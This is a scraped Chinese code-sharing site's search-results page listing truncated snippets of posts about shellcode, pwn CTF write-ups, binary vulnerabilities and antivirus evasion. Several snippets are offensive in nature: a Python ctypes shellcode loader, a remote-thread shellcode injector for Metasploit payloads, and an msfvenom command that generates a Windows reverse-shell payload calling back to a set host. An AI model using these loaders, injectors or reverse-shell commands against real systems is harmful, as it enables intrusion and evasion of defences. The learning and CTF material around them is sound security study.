ICode9

精准搜索请尝试: 精确搜索
  • python shellcode加载器2021-09-26 08:36:19

    默认是x64位的msf from ctypes import * from ctypes import wintypes import ctypes buf = b"" buf += b"\x56\xff\xd5" ctypes.windll.Advapi32.RegSetValueExA(-2147483647, "test", None, 3, buf,len(buf)) LPBYTE = POINTER(c_byte) ctype

  • 一个shell脚本弄清楚不同运行方法的不同2021-09-13 09:02:06

      为了弄清楚shell脚本的运行原理,主要有三种运行方式 1 #!/usr/bin/bash 2 echo 'hello world!' 3 4 echo $admin 5 6 echo $1 7 echo $0 0、准备工作:  $ admin="gg" 1、路径执行方式,包括相对路径和绝对路

  • 生成shellcode并自动提取:2021-09-11 17:03:31

    //生成shellcode并自动提取: #include <stdio.h> #include <Windows.h> int main(int argc, char * argv[]) { DWORD Start, End, Len; goto GetShellCode; __asm { ShellCodeStart: mov ebx, dword ptr fs : [0x30] mov ecx

  • 生成二进制shellcode.bin文件,然后将其动态读入内存,并执行即可.2021-09-11 17:01:01

    1 通过上方代码生成二进制shellcode.bin文件,然后将其动态读入内存,并执行即可. 2 3 #include <stdio.h> 4 #include <Windows.h> 5 6 int main(int argc, char * argv[]) 7 { 8 HANDLE fp; 9 unsigned char * fBuffer; 10 DWORD fSize, dwSize; 11 12

  • 逆向实战 | 植物大战僵尸shellcode种植辣椒2021-09-09 23:33:07

    参考视频:https://www.bilibili.com/video/BV1944y1y74f 先丢分析: 再丢代码: int full_jalapeno(){ // 辣椒清场 /* 火爆辣椒的id是0x14 樱桃炸弹的id是0x02 找对象基地址 1E0A6A30 =[edi(00AA9E08)+00000768] =[[6A9EC0]+00000768] =[[popcapgame1.exe+2A9EC0]+0

  • 2332021-08-29 23:03:40

    32位动态链接ELF,开启了Full RELRO,NX,PIE 查看main函数 int __cdecl main(int argc, const char **argv, const char **envp) { char buf[10]; // [esp+16h] [ebp-Eh] BYREF read(0, buf, 0x400u); return atoi(buf); } 显然存在栈溢出漏洞 (这里IDA解析出现了一点问题,实际

  • write up --ez_pz_hackover_20162021-08-27 12:35:17

    本题也是选出的比较有意思的一题,它涉及的知识点不难,但是有一些细节需要去注意。 分析 可以看到该程序是存在可读可写可执行段的,那么该题的考点大概率就是写入shellcode,我们还需要看看该程序具体的代码逻辑。 第一行是关闭缓冲区的,这个做题本身关系不大,header()函数的作用是打印

  • python shellcode分析2021-08-14 13:04:28

    https://blog.csdn.net/qq_32261191/article/details/108994177 分析shellcode ctypes是 Python 的外部函数库。它提供了与 C 兼容的数据类型,并允许调用 DLL 或共享库中的函数。可使用该模块以纯 Python 形式对这些库进行封装。在C/C++语言中,通过申请内存将shellcode加载到内存中

  • 通读BadCode2021-08-11 21:35:11

    简介 就是旋哥的BadCode系列,这次好好通读下,然后我在旋哥的注释上又加了一些,函数原型等。 项目地址:https://github.com/Rvn0xsy/BadCode 第一课 主要介绍了下cs的raw和c,然后就是混淆 旋哥使用Python做的混淆 xor加密,然后我把功能是干啥的都写在了注释里, import sys from argparse i

  • 初识二进制漏洞2021-08-05 00:01:04

    二进制漏洞是指程序存在安全缺陷,导致攻击者恶意构造的数据(如Shellcode)进入程序相关处理代码时,改变程序原定的执行流程,从而实现破坏或获取超出原有的权限。 常见的二进制漏洞 常见的二进制漏洞主要分为:栈溢出、堆溢出、整数溢出、格式化字符串、双重释放、释放重引用、数组访问越

  • 如何用python编写shellcode并且免杀2021-07-31 16:58:47

    大家好,我是铁汉fhoenix,今天和大家聊聊shellcode。 什么是shellcode 我在这里简单讲一下什么是Shellcode。Shellcode实际是一段代码(也可以是填充数据),是用来发送到服务器利用特定漏洞的代码,一般可以获取权限。另外,Shellcode一般是作为数据发送给受攻击服务的。 今天 让我来教大家

  • pwn第一天2021-07-26 13:01:35

    PWN新手自用入门笔记 1.pwn需要准备的工具pwntoolschecksecRopgadgetGDBone_gadgetLibcSearcher 2.pwn题小试牛刀首先是用nc连接服务端做题步骤和思路1.ret2text2.ret2shellcode 寄存器的知识: 保存栈状态的寄存器是存在在cpu里的,是整台计算机中最高速的存储容量最小的

  • pwnable_orw2021-07-22 15:34:34

    pwnable_orw 1.ida分析        首先程序的第一个函数实现了一个沙盒的功能,禁止提权和只能调用一部分的函数。 所以大概思路就是写入shellcode打开flag然后读出来。 2.查看可用函数    刚好open,read,write函数都可以使用。 3.解决 exp from pwn import * from LibcSearch

  • 2021-07-192021-07-19 21:31:35

    这里写目录标题 2、3、 2、 为了顺利完成下节课,建议仔细阅读下面这篇文章的Level 9部分: https://infamoussyn.com/2013/09/11/smashthestack-io-walkthrough-part-b-levels-6-10/ https://tomasuh.github.io/2015/01/19/IO-Wargame.html ,文章中利用.dtors的办法只是利

  • PWN之堆利用-unlink攻击2021-07-18 17:59:24

    一、 环境配置 笔者使用ubuntu14.04.6_desktop_i386 国内镜像网站如下: http://mirrors.aliyun.com/ubuntu-releases/14.04/ glibc版本2.20 二、ulink攻击 准备工作: 有漏洞的代码vuln.c /* Heap overflow vulnerable program. */ #include <stdlib.h> #include <string.h>

  • OSCP Security Technology - Modifying Shellcode2021-07-10 10:02:56

    OSCP Security Technology - Modifying Shellcode Generate a shellcode with msfvenom: msfvenom -p windows/shell_reverse_tcp LHOST=192.168.2.24 LPORT=4444 EXITFUNC=thread -f python -a x86 --platform windows -b "\x00" -v buf buffer.py #!/usr/bin/p

  • ShellCode 远程线程注入器 [首发]2021-07-05 07:31:20

    使用C语言实现了一个ShellCode远程线程注入工具,其主要是用于配合Metasploit生成的攻击载荷一起使用,通常可以直接将ShellCode注入到指定的进程内存中,不会再磁盘中留下任何痕迹,注入器可以通过远程下载到,并在命令行下实现对特定进程的注入操作,在后渗透测试中可以更方便的反弹后门。

  • 免杀学习——C++(一)2021-06-29 16:04:16

    一、基本函数学习   1、VirtualAlloc函数 用来动态申请内存,通常用来分配大块的内存 VirtualAlloc是一个Windows API函数,它包含在windows系统文件Kernel32.dll中使用时要引用windows.h   该函数的功能是在调用进程的虚地址空间,预定或者提交一部分页 如果用于内存分配的话,并且分

  • 9-6学习打卡(6.14)2021-06-15 00:02:03

    昨天休息了一天(感觉是好久没休息了),打了一下午狼人杀剧本杀、打麻将,好快乐,不过一日不学果然心慌慌,不过我感觉学习模式该调整一下,每天起来得先写好list,要不然效率不够高。 6.14 to do list: 1.每日Pwn学习 2.级数复习 to 数据结构小章 and 算法小章 3.Cpp第一章 4.密码工程练习(附

  • 渗透中POC、EXP、Payload与Shellcode的区别2021-06-13 10:03:54

    1. POC、EXP、Payload与Shellcode POC:全称 ' Proof of Concept ',中文 ' 概念验证 ' ,常指一段漏洞证明的代码。 EXP:全称 ' Exploit ',中文 ' 利用 ',指利用系统漏洞进行攻击的动作。 Payload:中文 ' 有效载荷 ',指成功exploit之后,真正在目标系统执行的代码或指令。 Shellcode:简单翻

  • 【metasploit】1 渗透测试与metasploit基础介绍 [PTES|msf|armitage安装]2021-06-13 00:02:08

    PTES标准渗透测试步骤 前期交互 与客户进行沟通,确定渗透测试的目标与范围 情报收集 收集客户组织的信息,利用包括但不限于社交媒体、Google hacking、端口/服务扫描等技术收集信息 威胁建模 根据收集到的信息,来推断目标系统可能存在的安全漏洞 漏洞分析 综合前面的信息,分析和

  • [CTF Wiki Pwn]Stackoverflow Lab002: ret2shellcode2021-06-08 22:00:31

    文章目录 1、检查保护机制2、IDA分析3、解题思路4、exp 1、检查保护机制 checksec的结果: 2、IDA分析 int __cdecl main(int argc, const char **argv, const char **envp) { char v4[100]; // [esp+1Ch] [ebp-64h] BYREF setvbuf(stdout, 0, 2, 0); setvbuf(std

  • [fmt+shellcode]string2021-05-23 11:59:44

    [fmt+shellcode]string 1. ida分析 main函数分析 看函数执行流程 通过 aaaa.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p得到format的偏移,再v2在format上面一个字节,就得到的v2的偏移 再通过任意写 %85c%7$hhn 将85写到v2的最低位的字节 %c:输出字符,配上%n可用于向指定

  • 渗透中POC、EXP、Payload与Shellcode的区别2021-05-12 16:34:16

    这个总结有意思! 想象自己是一个特工,你的目标是监控一个重要的人,有一天你怀疑目标家里的窗子可能没有关,于是你上前推了推,结果推开了,这是一个POC。之后你回去了,开始准备第二天的渗透计划,第二天你通过同样的漏洞渗透进了它家,仔细查看了所有的重要文件,离开时还安装了一个隐蔽的窃听

  • MIPS Pwn赛题学习2021-05-06 03:01:31

    MIPS Pwn writeup Mplogin 静态分析      mips pwn入门题。     mips pwn查找gadget使用IDA mipsrop这个插件,兼容IDA 6.x和IDA 7.x,在IDA 7.5中解决方案可以参考这个链接:https://bbs.pediy.com/thread-266102.htm     程序流程比较简单,输入用户名和密码进行登录操作。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有